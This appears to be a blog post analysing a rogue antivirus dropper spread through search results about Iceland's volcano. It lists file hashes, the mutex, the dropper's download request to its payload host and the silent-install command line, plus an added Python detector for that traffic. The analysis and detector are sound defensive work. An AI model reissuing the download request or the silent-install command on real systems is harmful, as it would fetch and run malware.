Beware of searching for Icelandic Volcano!!!

by Sriram.P

We use Google search for everything in our lives, from gardening to university study to keeping ourselves updated. How about a search for some details on the recent Iceland volcanic activity leading to malware!! Dangerous, isn't it!! But this does occasionally occur!! We need to be careful about the sites we visit from Google search results. Google makes every effort to keep bad results out of its search, but we still need to be careful.

This morning, while casually searching Google in my Opera browser for recent updates on the volcanic activity, I was led to a fantasy! A message box saying "Warning! Your computer is at risk of malware attacks". I was happy! I had caught a rogue, a fake alert. I decided to investigate it. I moved the message box sideways and found my browser minimized under it. I have attached the screenshot below, taken in Firefox!

A message box prompts me with "Warning! Your system is at risk of malware attacks" and assures me that it will help strengthen my system. I panicked. I agreed to its request by clicking OK. It then opened a Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

After the scan completed, it started alerting me that my system had a lot of problems that needed to be fixed. Check the screenshot below. The problems reported were: 1. registry to be fixed, 2. remove outdated temporary junk files, 3. hard disk defragmentation, 4. disk surface analysis, 5. webpage download speed.

I clicked the message box and it prompted me to download and save the file named "packupdate_build30_287.exe", and I did so. The hashes of the file are:

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now I let the file execute. It started extracting.

After extracting, a system scan started.

Finally,

My system is infected now!! Panic at the extreme!! Wanting to fix it, I clicked on "remove all". It was kind enough to open a window asking me to buy protection for 6 months ($65.00) or 1 year ($100.00).
Should I buy?

No, without any doubt. I know that I executed the file in a cleanly built WinXP SP2 virtual machine test environment in non-persistent mode, and there is no chance of it being infected.

I wanted to know more about its behavior and started to analyze it. This standalone executable is UPX packed. After a long time spent understanding the packer and unpacking the file, I finally found the entry point at:

0042905C   E8 59960000      CALL packupda.004326BA

On analyzing the strings, I found it could be a variant of the famous rogue "Virus Doctor". It creates the mutex:

004140D9  |> 68 48414000    PUSH 123.00404148                        ; /MutexName = "VirusDoctorInstallerMutex"

This file doesn't do anything remarkable; it just downloads a file from "update1.savecompnow.com" with a special GET request:

GET /index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows;U; Windows NT 5.1; en;)
Host: update1.savecompnow.com

With the above request, it downloads a file "MS64d4.exe" to "C:\Documents and Settings\All Users\Application Data\64d44d4", with hashes:
MD5: 67a790897462d3b238db34d53420f13a
SHA-1: 2ab7447375132b7f9367936b241913a25c4b2c71

and executes the file with the command line parameters:
""C:\Documents and Settings\All Users\Application Data\64d44d4\MS64d4.exe" /s /i /uid=287 /ls=30 "
/s - Silent
/i - Install

If you browse to this "update1.savecompnow.com" site with a browser like IE or Firefox, it displays:
ABBR is not properly set
SetupType is not properly set
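As an added example (not part of the original post), the following Python scans constructed proxy-log lines for the microinstaller GET request described above and matches a downloaded file's MD5 against the two hashes listed in the post; the log line format is an assumption.

```python
import hashlib
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the write-up: download host and the two files' MD5s.
ROGUE_HOST = "update1.savecompnow.com"
KNOWN_MD5 = {
    "9d44165fa043a2f9674055055233598e": "packupdate_build30_287.exe",
    "67a790897462d3b238db34d53420f13a": "MS64d4.exe",
}

def is_rogue_beacon(host: str, request_path: str) -> bool:
    """True when host and path look like the dropper's microinstaller GET."""
    if host.lower() != ROGUE_HOST:
        return False
    parts = urlsplit(request_path)
    if parts.path != "/index.php":
        return False
    # keep_blank_values so the empty 'pid=' seen in the capture still parses
    params = parse_qs(parts.query, keep_blank_values=True)
    return (params.get("controller") == ["microinstaller"]
            and "abbr" in params and "setupType" in params)

def scan_proxy_log(lines):
    """Return (timestamp, client) for each line matching the beacon.
    Assumed log format: '<timestamp> <client> <method> <host> <path>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed or blank line: skip rather than crash
        ts, client, method, host, path = fields
        if method == "GET" and is_rogue_beacon(host, path):
            hits.append((ts, client))
    return hits

def match_known_md5(data: bytes):
    """Name of the rogue file whose MD5 matches `data`, else None."""
    return KNOWN_MD5.get(hashlib.md5(data).hexdigest())

# Constructed sample log: one real beacon, one benign index.php, and one
# bare request to the host without the query string.
SAMPLE_LOG = """\
2010-04-22T09:14:03 10.0.0.5 GET update1.savecompnow.com /index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid=
2010-04-22T09:14:10 10.0.0.5 GET www.example.com /index.php?controller=news&abbr=MSE
2010-04-22T09:15:22 10.0.0.8 GET update1.savecompnow.com /
"""

if __name__ == "__main__":
    for ts, client in scan_proxy_log(SAMPLE_LOG.splitlines()):
        print(f"{ts}: {client} fetched the rogue microinstaller")
```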


Tip: You can prevent your browser from being resized by changing the JavaScript setting in Firefox as shown below.

1 comment

Comment from: Thomas Sloth [Visitor] · http://tesk.dk
Very nice blog post, Sriram :)
23/04/10 @ 08:35
